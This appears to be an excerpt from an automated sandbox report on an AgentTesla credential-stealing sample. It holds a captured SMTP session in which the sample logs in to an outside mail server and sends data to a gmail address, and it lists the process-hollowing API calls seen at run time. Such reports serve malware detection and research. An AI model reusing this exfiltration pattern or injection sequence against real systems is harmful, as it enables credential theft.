                                May 12, 2021 16:42:16.455365896 CEST49766587192.168.2.486.109.178.195EHLO 813848
                                May 12, 2021 16:42:16.532442093 CEST5874976686.109.178.195192.168.2.4250-h0226.hostytec.com
                                250-PIPELINING
                                250-SIZE 20480000
                                250-ETRN
                                250-STARTTLS
                                250-AUTH DIGEST-MD5 CRAM-MD5 PLAIN LOGIN
                                250-ENHANCEDSTATUSCODES
                                250-8BITMIME
                                250 CHUNKING
                                May 12, 2021 16:42:16.535346985 CEST49766587192.168.2.486.109.178.195AUTH login aW5mb0BnYXJjaWFkZWxhY3J1ei5jb20=
                                May 12, 2021 16:42:16.612245083 CEST5874976686.109.178.195192.168.2.4334 UGFzc3dvcmQ6
                                May 12, 2021 16:42:16.690330029 CEST5874976686.109.178.195192.168.2.4235 2.7.0 Authentication successful
                                May 12, 2021 16:42:16.690743923 CEST49766587192.168.2.486.109.178.195MAIL FROM:<info@garciadelacruz.com>
                                May 12, 2021 16:42:16.767704010 CEST5874976686.109.178.195192.168.2.4250 2.1.0 Ok
                                May 12, 2021 16:42:16.768399000 CEST49766587192.168.2.486.109.178.195RCPT TO:<williamslucy570@gmail.com>
                                May 12, 2021 16:42:16.846424103 CEST5874976686.109.178.195192.168.2.4250 2.1.5 Ok
                                May 12, 2021 16:42:16.846874952 CEST49766587192.168.2.486.109.178.195DATA
                                May 12, 2021 16:42:16.926548004 CEST5874976686.109.178.195192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                May 12, 2021 16:42:16.930042982 CEST49766587192.168.2.486.109.178.195.
                                May 12, 2021 16:42:17.420620918 CEST5874976686.109.178.195192.168.2.4250 2.0.0 Ok: queued as C80EF108681F7

                                Code Manipulations

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Start time:16:40:26
                                Start date:12/05/2021
                                Path:C:\Users\user\Desktop\6Rn5G1VWPB.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\6Rn5G1VWPB.exe'
                                Imagebase:0x620000
                                File size:1162752 bytes
                                MD5 hash:C12FEA2DA39E5173FA674AB5E22A928F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.657613935.0000000003A71000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.657613935.0000000003A71000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.657207704.0000000002ABF000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Start time:16:40:30
                                Start date:12/05/2021
                                Path:C:\Users\user\Desktop\6Rn5G1VWPB.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\6Rn5G1VWPB.exe
                                Imagebase:0x7d0000
                                File size:1162752 bytes
                                MD5 hash:C12FEA2DA39E5173FA674AB5E22A928F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.912960268.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.912960268.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.915088523.0000000002CF1000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Disassembly

                                Code Analysis

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:10.5%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:114
                                  Total number of Limit Nodes:9

                                  Graph

                                  execution_graph 14977 b3c083e 14978 b3c0841 14977->14978 14980 b3c2778 VirtualProtect 14978->14980 14979 b3c088d 14980->14979 15015 b3c6d5e 15016 b3c6d70 VirtualAllocEx 15015->15016 15018 b3c6dad 15016->15018 14981 b3c7078 14982 b3c7101 CreateProcessA 14981->14982 14984 b3c72c3 14982->14984 15022 1076ba0 GetCurrentProcess 15023 1076c13 15022->15023 15024 1076c1a GetCurrentThread 15022->15024 15023->15024 15025 1076c57 GetCurrentProcess 15024->15025 15026 1076c50 15024->15026 15027 1076c8d 15025->15027 15026->15025 15031 1076d51 15027->15031 15028 1076cb5 GetCurrentThreadId 15029 1076ce6 15028->15029 15032 1076dc2 DuplicateHandle 15031->15032 15034 1076d5a 15031->15034 15033 1076e5e 15032->15033 15033->15028 15034->15028 14988 b3c6df0 14989 b3c6e38 WriteProcessMemory 14988->14989 14991 b3c6e8f 14989->14991 14992 b3c6568 14993 b3c65a8 ResumeThread 14992->14993 14995 b3c65d9 14993->14995 15041 10763b0 15042 10763c0 15041->15042 15046 10764d7 15042->15046 15051 1076410 15042->15051 15043 10763d1 15047 10764dc 15046->15047 15048 1076541 15047->15048 15056 1076a68 15047->15056 15060 1076a88 15047->15060 15048->15043 15052 107644a 15051->15052 15053 1076541 15052->15053 15054 1076a68 2 API calls 15052->15054 15055 1076a88 2 API calls 15052->15055 15053->15043 15054->15053 15055->15053 15057 1076a6d 15056->15057 15058 1076acf 15057->15058 15064 10768e4 15057->15064 15058->15048 15061 1076a95 15060->15061 15062 10768e4 2 API calls 15061->15062 15063 1076acf 15061->15063 15062->15063 15063->15048 15065 10768ef 15064->15065 15067 10773c0 15065->15067 15068 10769dc 15065->15068 15067->15067 15069 10769e7 15068->15069 15073 107b818 15069->15073 15079 107b830 15069->15079 15070 1077468 15070->15067 15075 107b8ae 15073->15075 15076 107b861 15073->15076 15074 107b86d 15074->15070 15075->15070 15076->15074 15085 107bb68 15076->15085 15088 107bb78 15076->15088 15081 107b861 15079->15081 15082 107b8ae 15079->15082 15080 107b86d 15080->15070 15081->15080 15083 107bb68 2 API calls 15081->15083 15084 107bb78 2 API calls 15081->15084 15082->15070 15083->15082 15084->15082 15091 107bbb8 15085->15091 15086 107bb82 15086->15075 15089 107bb82 15088->15089 15090 107bbb8 2 API calls 15088->15090 15089->15075 15090->15089 15092 107bbdb 15091->15092 15093 107bbf3 15092->15093 15099 107be40 15092->15099 15103 107be50 15092->15103 15093->15086 15094 107bbeb 15094->15093 15095 107bdf0 GetModuleHandleW 15094->15095 15096 107be1d 15095->15096 15096->15086 15100 107be64 15099->15100 15101 107be89 15100->15101 15107 107b0b0 15100->15107 15101->15094 15104 107be64 15103->15104 15105 107be89 15104->15105 15106 107b0b0 LoadLibraryExW 15104->15106 15105->15094 15106->15105 15108 107c030 LoadLibraryExW 15107->15108 15110 107c0a9 15108->15110 15110->15101 14996 b3c02e5 14998 b3c2778 VirtualProtect 14996->14998 14997 b3c02f6 14998->14997 15111 b3c7c85 15115 b3c8290 15111->15115 15119 b3c8282 15111->15119 15116 b3c82ad 15115->15116 15123 b3c8a26 15116->15123 15120 b3c8290 15119->15120 15122 b3c8a26 SetThreadContext 15120->15122 15121 b3c7c9c 15122->15121 15126 b3c6618 15123->15126 15127 b3c665d SetThreadContext 15126->15127 15129 b3c66a5 15127->15129 14999 b3c6ee0 15000 b3c6f2b ReadProcessMemory 14999->15000 15002 b3c6f6f 15000->15002 15003 b3c9de0 15004 b3c9f6b 15003->15004 15005 b3c9e06 15003->15005 15005->15004 15009 107dec0 SetWindowLongW 15005->15009 15011 107deb9 SetWindowLongW 15005->15011 15013 b3ca060 PostMessageW 15005->15013 15010 107df2c 15009->15010 15010->15005 15012 107df2c 15011->15012 15012->15005 15014 b3ca0cc 15013->15014 15014->15005 15130 b3cc280 FindCloseChangeNotification 15131 b3cc2e7 15130->15131 15132 107dc78 15133 107dce0 CreateWindowExW 15132->15133 15135 107dd9c 15133->15135

                                  Executed Functions

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.660987864.000000000B3C0000.00000040.00000001.sdmp, Offset: 0B3C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b3c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0a5c0364d55e86f4a3661d3b19453297145d456e3bd367c61c369c6db7a5c5a7
                                  • Instruction ID: 7b6422d45c2bf67e9800fa414927179a253c302e642b3bcddd8af7af18d3af14
                                  • Opcode Fuzzy Hash: 0a5c0364d55e86f4a3661d3b19453297145d456e3bd367c61c369c6db7a5c5a7
                                  • Instruction Fuzzy Hash: 6A112771D0425C8FDB24CFA6C419BEEBBF1AB4E311F25906AD545B3294CB788984CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 01076C00
                                  • GetCurrentThread.KERNEL32 ref: 01076C3D
                                  • GetCurrentProcess.KERNEL32 ref: 01076C7A
                                  • GetCurrentThreadId.KERNEL32 ref: 01076CD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 2e24d3b52d75527be077c69a630bf5d02cb3caf5273c9adc1c98b3f0037196e6
                                  • Instruction ID: 4d719042e26bfff5182bc9d5e2a80111b92000c16700e97b9fcc3d126c3a2efd
                                  • Opcode Fuzzy Hash: 2e24d3b52d75527be077c69a630bf5d02cb3caf5273c9adc1c98b3f0037196e6
                                  • Instruction Fuzzy Hash: B35175B0D007498FEB14CFA9C5887EEBBF0FF49314F208459E449A7250D7759885CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 01076C00
                                  • GetCurrentThread.KERNEL32 ref: 01076C3D
                                  • GetCurrentProcess.KERNEL32 ref: 01076C7A
                                  • GetCurrentThreadId.KERNEL32 ref: 01076CD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: ab5a97e20ed741491fb58e6497b8be968de43823e1603144780099470f49eb4e
                                  • Instruction ID: e87e94cd34a080ef92fcce6dc5d915ef1a30073b6604b06f05201beb1b12b5e0
                                  • Opcode Fuzzy Hash: ab5a97e20ed741491fb58e6497b8be968de43823e1603144780099470f49eb4e
                                  • Instruction Fuzzy Hash: 015173B0D007488FEB14CFAAC588BAEBBF0FB49314F208459E459A3250DB75A884CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 38 b3c7078-b3c710d 40 b3c710f-b3c7119 38->40 41 b3c7146-b3c7166 38->41 40->41 42 b3c711b-b3c711d 40->42 48 b3c719f-b3c71ce 41->48 49 b3c7168-b3c7172 41->49 43 b3c711f-b3c7129 42->43 44 b3c7140-b3c7143 42->44 46 b3c712d-b3c713c 43->46 47 b3c712b 43->47 44->41 46->46 51 b3c713e 46->51 47->46 57 b3c7207-b3c72c1 CreateProcessA 48->57 58 b3c71d0-b3c71da 48->58 49->48 50 b3c7174-b3c7176 49->50 52 b3c7178-b3c7182 50->52 53 b3c7199-b3c719c 50->53 51->44 55 b3c7184 52->55 56 b3c7186-b3c7195 52->56 53->48 55->56 56->56 59 b3c7197 56->59 69 b3c72ca-b3c7350 57->69 70 b3c72c3-b3c72c9 57->70 58->57 60 b3c71dc-b3c71de 58->60 59->53 62 b3c71e0-b3c71ea 60->62 63 b3c7201-b3c7204 60->63 64 b3c71ec 62->64 65 b3c71ee-b3c71fd 62->65 63->57 64->65 65->65 67 b3c71ff 65->67 67->63 80 b3c7360-b3c7364 69->80 81 b3c7352-b3c7356 69->81 70->69 82 b3c7374-b3c7378 80->82 83 b3c7366-b3c736a 80->83 81->80 84 b3c7358 81->84 86 b3c7388-b3c738c 82->86 87 b3c737a-b3c737e 82->87 83->82 85 b3c736c 83->85 84->80 85->82 89 b3c739e-b3c73a5 86->89 90 b3c738e-b3c7394 86->90 87->86 88 b3c7380 87->88 88->86 91 b3c73bc 89->91 92 b3c73a7-b3c73b6 89->92 90->89 93 b3c73bd 91->93 92->91 93->93
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B3C72AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.660987864.000000000B3C0000.00000040.00000001.sdmp, Offset: 0B3C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b3c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 00e65fbbb4b54418eaeba8791c51b0befb45ab554bb69c65f51c27cf1dac9d40
                                  • Instruction ID: 00c70066f2e8fd22320d9969f4b50cb045c49d1f8bce6e5937930967ee668bc7
                                  • Opcode Fuzzy Hash: 00e65fbbb4b54418eaeba8791c51b0befb45ab554bb69c65f51c27cf1dac9d40
                                  • Instruction Fuzzy Hash: 06916971E00219DFDF24CFA4C881BEEBBB2BB48314F1481A9E859A7240DB749D85CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 95 107bbb8-107bbdd call 107b05c 98 107bbf3-107bbf7 95->98 99 107bbdf 95->99 100 107bc0b-107bc4c 98->100 101 107bbf9-107bc03 98->101 148 107bbe5 call 107be40 99->148 149 107bbe5 call 107be50 99->149 106 107bc4e-107bc56 100->106 107 107bc59-107bc67 100->107 101->100 102 107bbeb-107bbed 102->98 103 107bd28-107bde8 102->103 143 107bdf0-107be1b GetModuleHandleW 103->143 144 107bdea-107bded 103->144 106->107 108 107bc8b-107bc8d 107->108 109 107bc69-107bc6e 107->109 113 107bc90-107bc97 108->113 111 107bc70-107bc77 call 107b068 109->111 112 107bc79 109->112 116 107bc7b-107bc89 111->116 112->116 117 107bca4-107bcab 113->117 118 107bc99-107bca1 113->118 116->113 120 107bcad-107bcb5 117->120 121 107bcb8-107bcc1 call 107b078 117->121 118->117 120->121 126 107bcc3-107bccb 121->126 127 107bcce-107bcd3 121->127 126->127 128 107bcd5-107bcdc 127->128 129 107bcf1-107bcfe 127->129 128->129 130 107bcde-107bcee call 10798f8 call 107b088 128->130 136 107bd21-107bd27 129->136 137 107bd00-107bd1e 129->137 130->129 137->136 145 107be24-107be38 143->145 146 107be1d-107be23 143->146 144->143 146->145 148->102 149->102
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0107BE0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: ec23bae836eac19343f82fe012c1a123539cb256a2e7a36954a19dd044aca3e6
                                  • Instruction ID: c7f5e6aee81cffe2352372b74c2586330aa4a91c8d7a460cf2aaeab456f64080
                                  • Opcode Fuzzy Hash: ec23bae836eac19343f82fe012c1a123539cb256a2e7a36954a19dd044aca3e6
                                  • Instruction Fuzzy Hash: FE815670A00B098FD764DF2AC45479ABBF1FF88204F00896DE586DBA40DB75E806CF95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 150 107dc6d-107dcde 151 107dce0-107dce6 150->151 152 107dce9-107dcf0 150->152 151->152 153 107dcf2-107dcf8 152->153 154 107dcfb-107dd33 152->154 153->154 155 107dd3b-107dd9a CreateWindowExW 154->155 156 107dda3-107dddb 155->156 157 107dd9c-107dda2 155->157 161 107dddd-107dde0 156->161 162 107dde8 156->162 157->156 161->162 163 107dde9 162->163 163->163
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0107DD8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: dbf68b862fa387e61221a77ace93a094e8b4983c02078a28dfbd881083b01477
                                  • Instruction ID: 99399750f7be8603462a0d9faa00447a26a924f78aae377ec7d69d606247f67a
                                  • Opcode Fuzzy Hash: dbf68b862fa387e61221a77ace93a094e8b4983c02078a28dfbd881083b01477
                                  • Instruction Fuzzy Hash: 2C51BEB1D003599FDB14CFAAC884ADEBBF1FF48310F24812AE919AB210D7759985CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 164 107dc78-107dcde 165 107dce0-107dce6 164->165 166 107dce9-107dcf0 164->166 165->166 167 107dcf2-107dcf8 166->167 168 107dcfb-107dd9a CreateWindowExW 166->168 167->168 170 107dda3-107dddb 168->170 171 107dd9c-107dda2 168->171 175 107dddd-107dde0 170->175 176 107dde8 170->176 171->170 175->176 177 107dde9 176->177 177->177
                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0107DD8A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 7e7f8f8f4aad98844d86d33db3af8f3ed6a78862fc1a8c975271aa99b2b92f40
                                  • Instruction ID: 9148cc0f0d2f08a733d539c5192d19cedba73f268fe75b0cc7def7998e195765
                                  • Opcode Fuzzy Hash: 7e7f8f8f4aad98844d86d33db3af8f3ed6a78862fc1a8c975271aa99b2b92f40
                                  • Instruction Fuzzy Hash: B941CEB1D00309DFDB14CFAAC884ADEBBF5BF88310F24812AE819AB210D7759845CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 178 1076d51-1076d58 179 1076dc2-1076e5c DuplicateHandle 178->179 180 1076d5a-1076d89 call 1075c6c 178->180 181 1076e65-1076e82 179->181 182 1076e5e-1076e64 179->182 184 1076d8e-1076db4 180->184 182->181
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01076E4F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 1247c427e8d10af487ed0ce53bd243ebd4ced47722a02592a6038fde276acb7e
                                  • Instruction ID: 1016fc0c058ab2356e84a9fd35779ea677e43a8d70b15687c5ed5c718af6e13a
                                  • Opcode Fuzzy Hash: 1247c427e8d10af487ed0ce53bd243ebd4ced47722a02592a6038fde276acb7e
                                  • Instruction Fuzzy Hash: D0418876A00249AFDB01CFA9D884AEEBFF5FB49320F14806AE954A7310D3759955CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 189 b3c6df0-b3c6e3e 191 b3c6e4e-b3c6e8d WriteProcessMemory 189->191 192 b3c6e40-b3c6e4c 189->192 194 b3c6e8f-b3c6e95 191->194 195 b3c6e96-b3c6ec6 191->195 192->191 194->195
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B3C6E80
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.660987864.000000000B3C0000.00000040.00000001.sdmp, Offset: 0B3C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b3c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: fa98dbd0d6a83781abc0f99462e9232c5c6217b331be62afbef5dc91bcc16b49
                                  • Instruction ID: 518f18ce1393268cad4580b6634799c09162806e48c0080161ef1d88eef4e98b
                                  • Opcode Fuzzy Hash: fa98dbd0d6a83781abc0f99462e9232c5c6217b331be62afbef5dc91bcc16b49
                                  • Instruction Fuzzy Hash: 7C2136719003599FCF10CFAAC885BEEBBF5FF48314F10842AE959A7240C778A955CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 199 1076dc0-1076e5c DuplicateHandle 200 1076e65-1076e82 199->200 201 1076e5e-1076e64 199->201 201->200
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01076E4F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 813548249afa2d95b69ddfe0fc151c302714c9c64ec79f6fe292cf7018bf96d2
                                  • Instruction ID: 3b88ba266d402f2295d2c3e5b73922de14587dc12485a6686538b929a75f954e
                                  • Opcode Fuzzy Hash: 813548249afa2d95b69ddfe0fc151c302714c9c64ec79f6fe292cf7018bf96d2
                                  • Instruction Fuzzy Hash: 8D21D2B5D002489FDB10CFA9D888AEEBBF4FF48324F14845AE955A7310D375A955CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 204 b3c6618-b3c6663 206 b3c6665-b3c6671 204->206 207 b3c6673-b3c66a3 SetThreadContext 204->207 206->207 209 b3c66ac-b3c66dc 207->209 210 b3c66a5-b3c66ab 207->210 210->209
                                  APIs
                                  • SetThreadContext.KERNELBASE(?,00000000), ref: 0B3C6696
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.660987864.000000000B3C0000.00000040.00000001.sdmp, Offset: 0B3C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b3c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: ContextThread
                                  • String ID:
                                  • API String ID: 1591575202-0
                                  • Opcode ID: 810e7754b0ff1c425275aa7002c54d4bc5cd2eb7a41764422dd5c96df0c63ae9
                                  • Instruction ID: 20ace3ef8fdbd69884654bf9eb4ec396967fa97172acc4afc47e9cbe0706cd34
                                  • Opcode Fuzzy Hash: 810e7754b0ff1c425275aa7002c54d4bc5cd2eb7a41764422dd5c96df0c63ae9
                                  • Instruction Fuzzy Hash: 222115719003099FCB10DFAAC4857EFBBF4EF49264F14842EE959A7241CB78A945CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 214 b3c6ee0-b3c6f6d ReadProcessMemory 217 b3c6f6f-b3c6f75 214->217 218 b3c6f76-b3c6fa6 214->218 217->218
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B3C6F60
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.660987864.000000000B3C0000.00000040.00000001.sdmp, Offset: 0B3C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b3c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: b7c1623ac380178e4e548ce3520a94f6368cf0105a507a5aae1920c226efd4b2
                                  • Instruction ID: b30d5788006f87b1b28247a9c36d1a6a2f26a215062574332b7fbbce5f5452ea
                                  • Opcode Fuzzy Hash: b7c1623ac380178e4e548ce3520a94f6368cf0105a507a5aae1920c226efd4b2
                                  • Instruction Fuzzy Hash: DA2128719003599FCB10CFAAC8847DEBBF5FF48314F10842AE959A7240C7789945CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 222 1076dc8-1076e5c DuplicateHandle 223 1076e65-1076e82 222->223 224 1076e5e-1076e64 222->224 224->223
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01076E4F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 552e2039bfb2a5fc8ddb657a076c1da9ed901bf60ac0675c4fc268dbd5b2e7c6
                                  • Instruction ID: 7ecbc0c4a8cb6361718a0fbef89f1f59f5541392f400da14caf0adbd32ec044b
                                  • Opcode Fuzzy Hash: 552e2039bfb2a5fc8ddb657a076c1da9ed901bf60ac0675c4fc268dbd5b2e7c6
                                  • Instruction Fuzzy Hash: 1B21D3B5D002589FDB10CFAAD884ADEFBF8FB48324F14841AE955A3310D375A954CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 227 107b0b0-107c070 229 107c072-107c075 227->229 230 107c078-107c0a7 LoadLibraryExW 227->230 229->230 231 107c0b0-107c0cd 230->231 232 107c0a9-107c0af 230->232 232->231
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0107BE89,00000800,00000000,00000000), ref: 0107C09A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.656963430.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1070000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 1431c51c3d2d2e807a31da1cefed210ef8478b5bd81607a6f88f4af3c84d6f84
                                  • Instruction ID: c4b197f112a0734044f873620780521ba7eb1ad9ba4cfa8d605795cf11dbba2e
                                  • Opcode Fuzzy Hash: 1431c51c3d2d2e807a31da1cefed210ef8478b5bd81607a6f88f4af3c84d6f84
                                  • Instruction Fuzzy Hash: 8A1103B6D002098FDB14CF9AD448B9EFBF4EB49324F04842EE955A7600C3B5A945CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 235 b3c2778-b3c27f8 VirtualProtect 237 b3c27fa-b3c2800 235->237 238 b3c2801-b3c2822 235->238 237->238
                                  APIs
                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0B3C27EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.660987864.000000000B3C0000.00000040.00000001.sdmp, Offset: 0B3C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_b3c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID:
                                  • API String ID: 544645111-0
                                  • Opcode ID: caeb71f78723ad8996148011ee1a54369282efdb18bf7ebff46692af2fad05ee
                                  • Instruction ID: 5d7213200ea3e0c7a0383fbfca5ca44699ce5ace5f72cc5d6f4a0638d732316f
                                  • Opcode Fuzzy Hash: caeb71f78723ad8996148011ee1a54369282efdb18bf7ebff46692af2fad05ee
                                  • Instruction Fuzzy Hash: CA21E7B59002499FCB10CF9AD884BDFFBF4FB48320F108429E958A7240D378A945CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 240 107c028-107c070 241 107c072-107c075 240->241 242 107c078-107c0a7 LoadLibraryExW 240->242 241->242 243 107c0b0-107c0cd 242->243 244 107c0a9-107c0af 242->244 244->243
                                  APIs
